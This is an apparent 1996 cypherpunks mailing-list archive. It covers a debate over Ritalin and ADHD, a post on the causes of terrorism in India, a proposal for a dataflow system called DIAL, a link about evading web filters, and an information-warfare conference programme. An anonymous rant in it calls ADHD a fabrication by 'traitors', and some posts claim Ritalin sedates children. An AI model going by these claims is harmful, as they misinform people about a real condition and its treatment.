Date: Tue, 9 Jul 1996 06:01:17 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.91.960707072212.27417A-100000@crl6.crl.com>
Message-ID: <199607081710.NAA10477@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy Sandfort writes:
> On Sun, 7 Jul 1996, Simon Spero wrote:
> 
> > On Sat, 6 Jul 1996, Timothy C. May wrote:
> > > 
> > > ...she includes several "Ritalin"
> > > capsules with instructions on how to dose her son with this
> > > depressant/behavior modification drug.
> > 
> > Er... Tim... Ritalin is an amphetamine. 
> 
> Yes, normally, but doesn't it have a paradoxical reaction for
> hyperactive children (i.e., it acts as a depressant for them)?

1) If you believe that Ritalin has a different effect on hyperactive
   children, that would seem to indicate that the May hypothesis that
   hyperactivity isn't a biological phenomenon is false.
2) Yes, it appears that Ritalin has s different effect on children
   with ADD, in that it reduces their symptoms. "depressant", though,
   isn't the right term.

3) Of course, this isn't a crypto mailing list any more, so why NOT
   discuss every topic under the sun.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 05:58:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <ae053d5e0102100401bd@[205.199.118.202]>
Message-ID: <199607081713.NAA10490@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 1:14 PM 7/7/96, Simon Spero wrote:
> >On Sat, 6 Jul 1996, Timothy C. May wrote:
> >>
> >> When the mother (a single mother, as this is California) drops her son off
> >> with my friend (also single, of course), she includes several "Ritalin"
> >> capsules with instructions on how to dose her son with this
> >> depressant/behavior modification drug.
> >
> >Er... Tim... Ritalin is an amphetamine.
> 
> Whatever. It acts as a calmant/tranquilizer/depressant on many.

Only those who have ADD, which you claim doesn't exist.

> (As with many drugs, there are apparently paradoxical effects. Alcohol is a
> downer for some, and upper for others.)

Alcohol is a CNS depressant for all. Lowering inhibitions tends to
make people relax and "party", but it doesn't have particularly
paradoxical effects.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 8 Jul 1996 18:13:40 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <1.5.4.32.19960708130935.002db9e0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


I sent Tim's original post to a psychiatrist friend, who responded:

Ritalin is a lifesaver for a small % of children who suffer from a condition
characterized by hyperactivity and poor attention span.  These kids (usually
boys) may be bright as hell but fail in school because they can't sit still
or pay attention; they get made fun of, they behave badly, get depressed,
it's a mess.  

Some of them (milder cases) respond to behavior modification therapies which
involve training of the parents and teachers to have realistic expectation,
recognize the specific difficulties the kids have, set them goals, reward
them for achieving them, give them disincentives for misbehaving etc. Others
really do need Ritalin.  It's a relief not just for the parents and teachers
but for the kids to be able to sit still and pay attention and learn and
succeed and be liked etc.  Most of them grow out of it by their mid-teens. 
However, there are many more kids on Ritalin than there need to be; some
teachers pressure parents to get kids put on it... I know one very bright
little girl who's bored out of her mind in school, the school refuses to
move her up a grade or give her more challenging work to do, instead
complain that she is not paying attention and suggested that she be put on
Ritalin... mother was furious.  

Some of the kids who use foul language (a very small %) have Tourette's
disease, and also need medicine (a different one)... by and large the
politically correct thing is sometimes to label a kid as sick rather than
bad or spoiled, this is probably why drugs are over-used.  But we can't
throw the baby out with the bathwater!

By the way, some old people who are severely depressed after a stroke also
do well with Ritalin and don't respond to any other antidepressants...
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 8 Jul 1996 18:50:39 +0800
To: John Deters <vznuri@netcom.com>
Subject: Re: The Net and Terrorism
Message-ID: <1.5.4.32.19960708130958.002e8e58@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 19:52 02/07/96 -0500, John Deters wrote:

>Even so, there are a couple of problems with even attempting "to take away
>the root causes", not the least of which is the Constitutionally protected
>right to free speech.  I am allowed to teach my kid to hate anyone for any
>reason.  I can blame this or that group for this set of troubles, and that
>the best way to deal with this is not only to scare them away, but to kill
>as many of them as possible.  It may be morally repugnant, but it is
>protected speech.

I think we've all been exposed to awful teaching in some aspects of our
upbringing, but experience taught us otherwise. I love the anarchist poster
that says, "We are the people whom our parents used to warn us about." Just
because you were taught hate, doesn't mean you won't outgrow it. My mother
was active in the freedom struggle against the British, and told me enough
horror stories that I grew up hating them. But once I met some perfectly
decent specimens, it evaporated.

If the hate persists, there is likely to be reinforcement in the form of
injustices, further bad experiences, etc.

India is a large, diverse country with lots of injustice, poverty and other
problems. When we analyze what breeds terrorism, we find aspects such as:

- Severe neglect by the government (i.e. problems keep getting worse): For
instance, the north east (which is east of Bangladesh, and has a long
history of militant opposition) had to agitate for a long time to even get a
railway line to connect them to the rest of the country.

- Meddling by politicians: in Punjab, there was a Sikh regional party that
was quite strong. To erode its popular base, Indira Gandhi encouraged the
fundamentalists on its right. Similarly, Rajiv Gandhi's government helped
train the Tamil LTTE. Both paid for these blunders with their lives, at the
hands of the very groups they had once tried to foster.

- Disenfranchisement: In Kashmir, most elections were rigged, as the central
government pretty much admits now. Interestingly, some of the leaders of the
terrorists were polling agents at the time of the previous elections, and
were quite disgusted at what they saw.

>The countries that sponsor terrorists have not been noted for their
>successful educational systems.  And they certainly are not going to listen
>to Western discussions on how best to solve their "problems".

No, but give the people the conviction that they can get their problems
redressed legally, that they can win political power peacefully, and
basically not let problems fester for so long that all trust in government
is lost, and people will be far less likely to take to arms. 

Phoolan Devi (seen "Bandit Queen"? Great movie) was a dacoit, supposedly
responsible for serious massacres. She went to jail, now she is an elected
member of the federal Parliament. That is a great message to send to the
poor and deprived. The cynic in me sees this as a way of depriving the poor
suffering masses of their leaders, by co-opting them into the ruling elite.
But there is no shortage of followers eager and willing to take their place.

>The U.S. has a level of tolerance for diversity that I 
>only recently came to
>appreciate.  We hosted a foreign exchange student from Scotland (hardly
>culture shock to him), but he surprised me when he commented on how
>surprised he was that different groups of people were mixed together

I've had a similar experience. I was part of the Indian delegation to a
couple of Amnesty International International Council meetings. In this
organisation, multiracialism and multiculturalism are heavily promoted. But
if you looked at delegations from Europe, even from countries with sizable
racial minorities, they were typically all-white. The US delegation, on the
other hand, had blacks, different kinds of Asians, Hispanics... and not by
design -- the US section leadership is highly "mixed", so they did not have
to think about multiracialism, it just happened. Of course, given the
"melting pot" ethos in the US, this is hardly surprising.

However, every society has its blind spots. Communism is a real US phobia.
The way you treat puny Cuba I find truly amazing.
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 06:30:08 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <ae055cd3030210046616@[205.199.118.202]>
Message-ID: <199607081725.NAA10514@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> From what I've read--and I'm no expert, having long had essentially the
> _opposite_ of "attention deficit disorder," assuming it really even
> exists!--most children getting Ritalin are just being sedated.

Speed is not a sedative. Ritalin is amphetamine, not a barbituate. For
most people, its like drinking lots of coffee -- it seriously
increases attention and lowers your ability to sleep.

> Behavior control in its purest form. While the kids stop their
> wandering attention and constant physical motions, it's because
> they're in a mental fog, just one step away from drooling.

Thats not what Ritalin does to *anyone*. If anything, amphetamines are
abused by people who want to remain awake and alert.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 9 Jul 1996 10:52:51 +0800
To: coderpunks@toad.com
Subject: DIAL: directed information assembly line
Message-ID: <199607082052.NAA02741@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



over the past few months I've been intermittently posting some
snippets and fragments of ideas on a new information processing system.
I've codified most of what I was talking about into a semi-formal
protocol description. 

I think this has tremendous potential for
wide applications, and I suspect many of these ideas below are
already being used in many diverse contexts but have not been
unified into a single specification (which I think will increase their
value and use signficantly). I suspect something like the following
is actually going to be a natural, inevitable evolution of the current 
"information infrastructure" and cyberspace-- i.e. something like
the following is going to evolve whether I personally work on it or not,
or whether future designers see this particular essay or not.

anyway, I will try to incorporate comments from correspondents into
future revisions. I would love to put together a group of people
interested in continuing to develop this although that's probably
premature at this point. thanks to everyone who has (unwittingly) 
contributed to this so far based on responding to my earlier essays.

===




DIAL

= introduction
= terminology: flits, floutes & bloxes
= fault tolerance
= tracing
= time estimation
= common bloxes
= implementation
= examples



introduction
==

The industrial revolution was driven by specific technologies.
Similarly, the "information revolution" is now in full pace 
using a different array of new tools. However, it is unlikely
that all information processing tools have been invented yet.
This paper is a preliminary sketch of one such potentially 
significant tool called DIAL.

DIAL stands for "directed information assembly line". This 
document contains a description of this novel information processing
architecture. This proposal outlines the idea and contrasts
it with existing systems, showing how it highlights certain
aspects of data processing that are not specifically addressed in,
but seem to be implied by, other existing tools. 

The system can be viewed variously as
a programming environment, a monitoring system, a revision
control system, a quality assurance and quality control
mechanism, a fault tolerant computing system, 
a workflow (re)engineering technology, a company
intranet routing algorithm, an operating system
based on virtual reality, etc.


terminology
==

DIAL is something like a "dataflow" oriented system. This document
will not describe any specific implementation of the DIAL concepts
(such as giving a language syntax) but instead focus on its 
abstract properties which can be implemented in multiple ways.

There are 3 basic components in the DIAL universe:

"flit" - a flit is a unit of information that has an associated
DIAL state. The information can change over time. One aspect of state
is "location". "flit" stands for "fleeting bit", i.e. a piece of 
data that can "move".  The number of binary bits allocated to a
flit may vary per flit or over time.

"floute" - a floute is a "flit route" or a path that a flit can
take. Conceptually flits move through the flouts. A flout can
be implemented in various ways, such as "last in, first out", 
"first in, last out", a pool of data, etc.

"blox" - a blox is a "black box" or a component that changes the
information content of a flit. Bloxes are connected to floutes.

The DIAL system is recursive in that any of the 
3 basic objects can be contained or encoded
in the 3 objects. For example, flits can contain flits, bloxes
can contain further floutes and bloxes, etc.

Conceptually, a DIAL system is a directed graph, with
nodes called "bloxes", edges called "floutes", and a superimposed
set of things called "flits" that can, over time, "move through" the 
network.

In many cases flits have a natural analogy to messages being
passed through the system.

Bloxes contain a single internal state, like a regular automaton.
They can send requests, and respond to, memory bloxes.

DIAL is unlike a programming language in that "time" is considered
a key property of what it models. Many languages handle the concept
of time implicitly through the use of variables. But programming
languages have a computation-centric view of processing, such that
programs are seen as directing and operating on data. In DIAL, 
data is seen as flowing through components, a data-centric view. 


fault tolerance
==

To be implemented correctly, the state of a DIAL system at
any given time is incorruptable.  All operations have total
integrity.  The system is designed to coordinate unreliable
subprocesses and must itself be reliable.

In DIAL, a blox is roughly analogous to some kind of process.
The process may or not be entirely computational. The blox
models an unreliable process. The process
is activated when a flit approaches the blox from a 
connecting floute, at which point the flit "enters" the 
blox. DIAL handles the protocol of informing the blox (or rather,
the process represented by the blox) of the
presence of the flit. DIAL keeps track of all flits that are 
currently being processed by bloxes. The blox should process
the flit and push the flit into some other floute which signals
it has successfully operated on the flit.  Combinations of
flits at inputs can be processed, and multiple outputs are supported.

The DIAL system allows processing time limit rules to be associated 
with flits, floutes, and bloxes, such as a floute assigning time
limits to flits that move through it, time limits associated with
all flits going through particular bloxes, or time limits attached
to flits. (The system will have a precedence to these rules.)
The motion of flits through floutes is handled by the DIAL system
and is incorruptable. Flits can "pile up" in floutes if not processed
by connecting bloxes as rapidly as they accumulate. All bloxes may have
different amounts of processing times on incoming flits.

When a blox fails to "return" a flit in the time limit, the DIAL
system can be programmed to automatically take particular
countermeasures.  The countermeasure programs are associated with
flits in the same way the expiration time is (via the flit, a 
floute, or a blox, and having precedence rules).

- DIAL can ask the blox, "have you heard of this flit". The blox
can reply, (1) "yes, I am still working on it", or (2) "no, I have not
heard of it". The rules can specify possibilities such as
resubmitting the flit, cancelling the flit processing
and redirecting it elsewhere, propagating other flits into floutes 
(which might represent message(s) sent to "failure controllers"), etc.

- The blox may reply, "the flit has corrupted the blox". This may
happen in systems without transaction integrity. Again rules
can automatically be followed to try to "clean up" the system by
propagating new flits to particular floutes or possibly resubmit 
the flit.

- The blox may not reply. Again, rules for countermeasures can
be programmed into the DIAL system.


tracing
==

All flits have unique IDs that can be traced. At any time a query
can be sent to the DIAL system, "where is so-and-so flit?" and
the system will describe the exact location of the flit. Flits
can never vanish, even when bloxes fail to operate correctly. 
Every flit has a history as well. The flit may 
contain different information at different times. The system allows 
some number of earlier information states of the flit to be accessed.
Information about the past flow-path of the flit and each associated
change in contents (prior and subsequent to entry and exit of a blox)
is available. This could be called a "replay" feature.

In a query of a DIAL system, it may actually reply, "the flit was deleted", 
although its earlier states would still be accessable. Another possible
response is, "the flit moved out of this DIAL system", but again
some number of its penultimate states, while it was still "inside",
would still be accessable. Again, customizable rules determine how
much history is available.

General queries such as "locate all type [y] flits that have not moved
within [x] time period" are supported. Past histories of the flits
that have moved through flouts and bloxes are also available.
The system can support some degree of "global or local rollbacks"
in which prior processing flows are reset, redirected, restarted,
etc.  An ability to locate components based on traffic is supported,
such as floutes where current flit queue lengths are of some
size, etc.

The system allows the assignment of arbitrary version numbers with
particular flit states that are also allowed in queries.


time estimation
==

An implementer of a DIAL system might support specialized queries
called "time estimates". A flit is passed into a system with a special
flag that indicates processing time should be estimated but results
should not be computed. The flit flows as far through the system
as possible and records time estimates as it passes the bloxes.
When it finally emerges, cumulative statistics on the time estimates
that would be associated with an actual processing of the flit
are available to the requester.


Common bloxes
==

- extracter/combiner

Bloxes to extract flits, floutes, or bloxes encoded in flits
are available, as well as to create flits that encode any
of the same objects.

- warehouse

The DIAL system can support a flit warehouse in which all flits are
stored when they are not being propagated elsewhere through the
system. The warehouse is a blox that responds to flit queries
in the form, "move flit [x] into floute [y]".  (The motion of
the flits into and out of the warehouse resembles the checkin
and checkout task of RCS software.)

- create bloxes

In a static DIAL system, all bloxes and floutes are predetermined
and fixed.  In a dynamic system, the bloxes and floutes may 
change over time. This is accomplished by feeding special flits
into bloxes that can create other bloxes and floutes as
their result. Other bloxes can connect them in specified ways.
The dynamic system is far more complex and is reserved for
specialized situations.

- rerouter

A special rerouter blox is useful for dealing with new versions
of other bloxes. A frequent problem that arises with new versions
of software (i.e. a new blox) is that it is incompatible or has
bugs. The rerouter blox is capable of rerouting a request to a
new version of a blox to an older version when problems arise
in the processing.

- tester

Often results output from bloxes are to be tested for consistency
to ensure the bloxes are functioning properly and not returning
spurious results.

- tester/comparer/rerouter

Another useful blox for fault tolerance can take the results of
two other bloxes and compare them for discrepancies. Flits output
from a new version of a blox could be compared with the flits from
the previous version, and automatic actions be taken on any
discrepancy (such as passing through the old version while flagging
the exception). The comparer allows the system designer to more
elegantly deal with regular "upgrades". In fact it is the embodiment
of automated regression testing.

- isolater

Often input of flits is batched into groups, and some flit in the
group may cause problems in the processing, but further detail in
revealing the exact "bad" flit is not available.  The isolater
can automate this process in an algorithm that resembles the 
classic linear search. The input batch into a blox is consecutively split 
into halves by the isolater until the smallest erroneous pieces are 
isolated and hilighted.

- global versioner

Often a system with many bloxes has new versions of the bloxes, and
there is need in globally switching control to new bloxes. This
can be accomplished with the use of a special global versioner
blox.  It can keep track of the different versions of all bloxes
in a given DIAL configuration, and switch between configurations.

- bad blox isolater

Combining many of the previous bloxes, a special system that
automatically isolates new versions of bloxes that fail to 
be backward and/or forward compatible is possible. This is a 
direct implementation of the software development pipeline.


implementation
==

The DIAL system should be implemented graphically and visually.
A corresponding language specification to describe a DIAL network is 
possible and desirable, but a visual or graphical interface to any operation 
should always be possible; likewise a representation of all 
DIAL states should be supported. Ideally, the DIAL universe could be
visualized in a 3d virtual reality, and a person could physically
"grasp" and manipulate all the basic objects (flits, floutes, bloxes).
The one-to-one visual representation of DIAL and its states is a
key aspect of its accessability and usefulness.

There should be in principle no memory limits on the core
DIAL entities: flits, floutes, or bloxes. Limits in implementations
such as "a maximum of 50 queued flits per floute is supported" are
antithetical to the basic design principles. However there may be
various memory limits associated with particular uses of the
entities that model a particular application. 

The DIAL system internally must have many protections that maintain
its internal consistency at all times to prevent corruption of
its state. However, unreliability of all components it models
is allowed (and specifically designed for). 
The states of components are allowed to be 
inconsistent to some degree, such that a state like "blox went 
down" might arise at a random time. Typically in implementations,
the "last known state" of a blox would be tracked, along with 
protocols to retrieve the most recent state and allow resetting
or other manipulations of the state.

Recent new technologies such as the Web and Java may be excellent
environments for implementing aspects of the DIAL specification.
Recent widespread interest and developments in intranets, workflow 
analysis, and reengineering may be very tangibly furthered
through the introduction and use of DIAL systems.


examples
==

1. a DIAL system can be used to model the workflow of a company.
Individual flits can be thought of as documents, and bloxes
are the operations that transform the documents. The history
mechanisms are identical to revision control. Floutes represent
interactions or communication paths between people or departments.

This is the primary "information assembly line" application 
of the DIAL concept. In this system, the "paperwork" cannot be lost
because of the inherent properties of DIAL. In fact it is in these
sitations that history, tracing, and "timeout" mechanisms are most 
valuable. The estimation feature gives an approximation of "how
long will this take when submitted".
 
2. a DIAL system could reflect the internal state of packets
on a network. Individual computers, routers, etc. are seen as bloxes,
and messages are the flits, and floutes are the network routes.
The DIAL tracing features are especially useful in this context.

3. a DIAL system could represent a large, complex software project.
Individual bloxes are the components in the program. The 
versioning capabilities deal with the development pipeline.
Regression testing and the process of moving to new versions is
explicitly built into the system.

4. the DIAL system might represent data being sent over the
World Wide Web. 

5. the DIAL system could represent a distributed computing system
in which the bloxes are spread out over the Internet (the floutes),
and socket communication is used to transport flits.

6. In many debugging situations, "bad data" is detected without any 
knowledge of its history and complex measures are employed to try
to deduce the prior processes that led to it. The history mechanism in 
DIAL allows a user to trace prior states of the flit and find the 
exact point or blox where the corruption occured. Also, the capability of 
putting a "rider" on a flit that detects when it is modified in 
some way is possible.

7. There is a natural correspondence between every computer language
and the DIAL system. Subroutines or arithmetic operations 
are like bloxes, and parameters are passed in floutes. 
Variables are the contents of specific "floutes"
at various points in processing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 9 Jul 1996 09:08:05 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Web redirector to defeat kiddie-filters?
Message-ID: <9607082055.AA23265@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, sort of.....

http://www.mordor.com/neslon/decide/

    Ryan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 9 Jul 1996 09:42:39 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children [RitalinPunks]
Message-ID: <199607082103.OAA07069@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Something like 10% of ALL public school students in Tennessee are on
Ritalin.  Presumably, the percentages are similar in other states.  I 
have trouble believing there are so many kids suddenly suffering from a 
disorder that wasn't even discovered until a few years ago.

The following rant from a Ritalin user may be of interest (though not too 
relevant to cryptography):

*************************************************************************

Occasionally I will see something about the practice of giving kids
RITALIN for alleged attention-deficit disorder. I can't think of better
evidence that the owners of the schools and the world are trying to
destroy the kids in this country.

I was big drug-taker. I've also had occasion to receive medication by
prescription. I wil admit that I took a lot of amphetamines. Speed that 
is. I liked it and took it frequently, so I can attest that it has some 
very attractive char-acteristics that anyone taking it could not help but 
like at the time.

It also has a gigantic letdown that is nearly intolerable. This
discomfort leads ANYONE to do something to alleviate it. It's probably
a matter of personal preference as to whether the discomfort of the
letdown outweighs the positive feeling of the high. If not, people
will keep taking speed.

Now for reasons, I also had a prescription for ritalin. You know
it's a controlled substance. The fact is it's an amphetamine
derivative and imparts nearly the exact same experience, though
not as sharp-edged. It has the high and the letdown. And people
undoubtedly make the same kinds of decisions as is the case with
amphetamines.

They say that ritalin has a paradoxical effect on kids - meaning,
I suppose, that the reasons that make it a controlled substance
for adults doesn't apply to kids. Then they say in the same breath
that ritalin treats disorders in the ability to concentrate or to
pay attention, which are the exact things that speed and ritalin
accomplish in adults.

Both of these allow someone to focus exclusively on one task in
an enjoyable state of mind and body and accomplish it. Any
nervousness is just left over from the channeling of all the
generated energy into one task. What is created is not only the
false sense of security but the false ability to accomplish
things. As time goes on, one aspect of the letdown is the now-
understood knowledge that speed is generating false successes.
This is a depressing realization that can have detrimental
ramifications beyond anything to do with the drug.

In college, say, false successes on exams are acceptable and
desired because this is one occasion in which performance is
measured. But when someone's life consists of false successes,
false interactions, and false experiences - and the fact that
these are false is well-realized - the result can be a very
unhealthy individual self-conception whose validity is proved
and reproved constantly as amphetamine use continues.

I heard recently that now educators and other quacks find that
ritalin enhances performance for everyone (I just said that),
and they're thinking of prescribing it for that reason. This
kind of poisoning of the self-concepts being developed by kids
will create a generation of suicidal invalids. The idea is
outrageous.

This has gotten extremely long, and I wasn't planning on it.
But this ritalin thing is so insidious and is so OBVIOUSLY
meant to do harm that I have to write this long thing about
it. The whole attention-deficit disorder is a fabrication
that traitors use to pump kids full of controlled substances.

Now i saw yesterday that kids not on ritalin are paying those
who have it, stealing to get it, killing to get it, and on
and on. Ritalin is speed, and the idea that educators, doctors,
and other alleged public servants are colluding in this way
to cripple kids into thinking they have no innate skills and
no ability to function without a drug is one of the worst
things I have come across in my entire life.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Tue, 9 Jul 1996 09:36:22 +0800
To: Nmunro@access.digex.net
Subject: InfoWarCon V: DC
Message-ID: <199607081810.OAA23694@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


* * * * * * * P L E A S E   D I S T R I B U T E  W I D E L Y * * * * * * *

                           InfoWarCon 5, 1996
            Electronic Civil Defense for the 21st. Century
 The Convergence of the Commercial and the Military Sectors:
              Vulnerabilities, Capabilities and Solutions
                          September 5-6, 1996
                            Washington, DC
 
 Sponsored by:
 
      Winn Schwartau, Interpact, Inc./Infowar.Com
      National Computer Security Association/NCSA.Com
      Robert Steele, OPEN SOURCE SOLUTIONS, Inc./OSS.Net
 
 Sponsoring Organizations:
	Command Software Systems
	Digital Equipment Corporation
 	Norman Data Defense
 	IBM
	Phillips Publications
	Jane's Information Group

 Historically, civil defense has meant to protect citizenry against hostile
military actions. Today, with the specter of Information Warfare representing
new challenges to late-industrial and information age nation-states, the rules
have radically changed. Societies are rapidly migrating to increased dependance
upon four critical interrelated infrastructures and adequate methods of
protection must be developed:
 
 	- The Power grid is the basis of most of modern society. With it gone,
not much else happens.  If you think this is just a matter of building more
generators, think again--what happens if the factories that *make* the
generators are taken down, too? 
 
 	- The Communications infrastructure: land, sea, air and satellite. 95% 
of
military communications go over the public networks, and 100% of all financial
and industrial communications. Is it worth protecting?
 
 	- The Global Financial structure depends upon the first two
infrastructures, and is perhaps the most vulnerable to theft and denial of
service attack.  99+% of all "wealth" is digital--what happens if it vaporizes?
 
 	- Transportation systems rely upon the other three. The air traffic
systems require both power and communications to manage the thousands of
airplanes in the sky.  What happens to the thousands of airplanes in the air
if air traffic control across an entire country goes down?
 
 Without all of these infrastructures properly and reliably functioning, the
private sector and the national security community cannot function. No heat, no
air conditioning, no food distribution, no light, no radio or TV, no Internet.
Are we prepared?  Do we have a a crisis response for the day money as we  know
it vanishes?
 
 Electronic Civil Defense will soon become a critical component of any nation's
well being while the needs of both the private sector and government converge.
The convergence of military and civilian interests that Mr. Schwartau predicted
two years ago is happening before our eyes. Defensive and commercial postures
have so intertwined as to make them indistinguishable.
 
 This Fifth International Conference on Information Warfare is an unclassified,
open source forum, and will examine the myriad questions of Electronic Civil
Defense from the US, International and multi-cultural perspectives.
 
 Our seasoned experts will work with InfoWarCon5 delegates to outline a
framework for the vulnerabilities, threats, risks and solutions for Electronic
Civil Defense.  From this conference participants will be able to draw critical
insights which will improve their own legislative, regulatory, financial, and
operational readiness and security.  Last year's Washington InfoWarCon brought
together over 600 people and was covered by CNN among other major media
organizations. This year key world players in information warfare from the
economic, military, and law enforcement communities of over 30 countries are
expected to participate.    Be prepared for highly interactive sessions with
plenty of audience participation.  Please bring  your opinions and be ready to
discuss them with us all!
 
 PRELIMINARY SCHEDULE
 
 September 4, 1996
 
 16:00 - 20:00	Registration Begins
 
 18:00 - 20:00	Sponsored Reception for attendees, speakers, sponsors and the
press.  Light food fare and  liquid refreshments. Meet Mr.Schwartau, Mr. Steele, 
Dr. Kabay and many of our other world-class speakers.
 
  September 5, 1996
 
 6:30 - 7:50	Registration
 
 7:50 - 8:00 	Welcoming Comments and Administration:
 			Dr. Peter Tippett, NCSA
 			Winn Schwartau, Interpact, Inc.
 
 8:00 - 8:30 	Keynote Presentation:  "National Security in
			the Information Age" Senator William Cohen (R-Maine) *
 			
 8:30 - 9:00	"A Commander in Chief's View of Rear-Area, Home-Front
 			Vulnerabilities and Support Options."
 
 			General John J. Sheehan, U.S. Supreme Allied Commander,
			Atlantic, Commander-in-Chief Atlantic Command 
 		
 9:00 - 9:30 	"Global Finance: Protection in the Age of Electronic Conflict"
		Colin Cook, V.P. Information Security, Citibank *
 		 	
 9:30 - 10:00	"We Can't Do It Without the Private Sector"
 			Ken Minihan, Director, NSA *
 
 10:00-10:30 	Break
 
 10:30-11:45 	National Policy Reviews of Electronic Civil Defense Programs
			Ms. Sally Katzen, Administrator for Information and 
Regulatory
			Affairs, Office of Management and Budget, USA
 			Dr. Anders Eriksson and Peter Wallstroem,
			   National Defence Research Establishment, 
				   Dept. of Defence Analysis: Sweden
 			Dr. Leroy Pearce, Canada, 

 		What is the current thinking in Electronic Civil Defense? 
 		How do plan on protecting our citizens against invisible 
 		unnamed assailants? What are the top policy makers 
 		planning for? International experts will present their 
 		views as well.
 
 11:45 - 13:15	Sponsored Lunch
 
 12:30 - 13:00	Luncheon Address
 
 13:15 - 14: 30 	Breakout Sessions A1 - A4
 
 	A1	A Military Briefing: The Electronic Projection of Power in a C4I 
World
 			Moderated by General Jim McCarthy, USAF (Ret)
 				Barry Horton, Principle Deputy Assistant
				Secretary of Defense for C3I *
 				Captain Patrick Tyrrell, Assistant Director,
				 Information Warfare Policy, Ministry of 
				Defence, United Kingdom
 
 	A2	Protecting the Global Financial and Communications
 		 Infrastructures: Weaknesses at the Transport Layer
 			Ron Eward, Martech, Inc.
 
 	One scary session. Forget about HERF Guns and hackers. Mr. Eward 
 	will tell us how to wreak disaster with a few well placed pick-
 	axes, from New York to Palermo to Taipei. An incredible research 
 	effort with global on the generally forgotten physical 
 	underpinnings of Cyberspace. Do not miss his tremendously 
 	important findings. Messrs. Eward and Schwartau upcoming book on 
 	this overlooked topic will shake the financial global community.
 
 	A3	Media Manipulation, Perception Management and PsyOps
 			Moderated by Dr. Mich Kabay, NCSA
 				Mark Bender, ABC News *
 				Jim Roberts, SOLIC 
				Neil Munro, Washington Technology
 
 	How can a nation-state use the media to bend the will of an 
 	adversary, or leverage its own position prior to, in or after a 
 	conflict? Who is really using who?
 
 	A4 	National Defense University Session
 		Moderator - Dr. Dan Kuehl, Professor, NDU
 
 	Top students from the School of Information Warfare and
	Strategy, the Nation's top-level school for potential flag
	officers in the IW arena, will discuss their findings and
	concerns.
 
 14:30 - 15:00	Break
 
  15:00 - 16:15	Breakout Sessions B1-B4
 
 	B1 - Emergency/Disaster Planning for the Effects of Information Warfare:
 		Moderator: Mark Aldrich, Chief Infosec Engineer, GRC 
 					International, Inc.
 			Michael Logan, Federal Planning Associate, 
 					American Red Cross
 			William W. Donovan, CISSP, FEMA
 			Ken Barksdale, Association of Contingency 
 						Planners 
 
 	Assume the worst happens, and an infowar assault takes down major 
 	life sustaining portions of the infrastructure. What do we do 
 	about it? How do we minimize the damage and protect the victims 
 	and citizens? These esteemed experts will tell you what they think 
 	and then invite your comments.
 
 	B2	Legal Liabilities and Responsibilities in Information Warfare
 			Danielle Cailloux, Judge, Committee on 
 				Intelligence, Belgium 
 			Charles Dunlap, Judge Advocate, USAF
 			Kenneth Bass III, Cyber-Attorney, Washington
 
 	If a company is attacked and it loses significant assets, what 
 	are the recourses of the stakeholders? How do we measure and 
 	evaluate the losses and responsibility? On the military side, what 
 	constitutes an Act of War and what steps are necessary to formulate 
 	a response?
 
 	B3 The Forensics of Information Wafare for Law Enforcement
 		Moderated by Michael Anderson, New Technologies 
 				Investigation Division
 		Howard Schmidt, Director, AF Office of Special 
 				Investigations 
 		Ken Rosenblat, Santa Clara County Prosecutor, Author 
 				"High-Technology Crime: Investigating 
 				Cases Involving Computers" 
 
 	How can you tell you are under attack? Once you determine you are, 
 	how do you make a case which will stand up in court? How do you 
 	collect evidence? How do you involve law enforcement without 
 	compromising your efforts? Experts share years of experience with you.
 
 	B4	Naval Postgraduate School Session
 			Moderator: Dr. Fred Levien, NPS
 
 	Top field grade students from the Naval Postgraduate School in
	Monterey, California will present InfoWar papers and concepts.
 
 16:15 - 16:45	Break
 
 16:45 - 18:00	The Hacker/Underground and Social Engineering
 
 		Moderated by: Nic Chantler, Australian Intelligence (Ret)
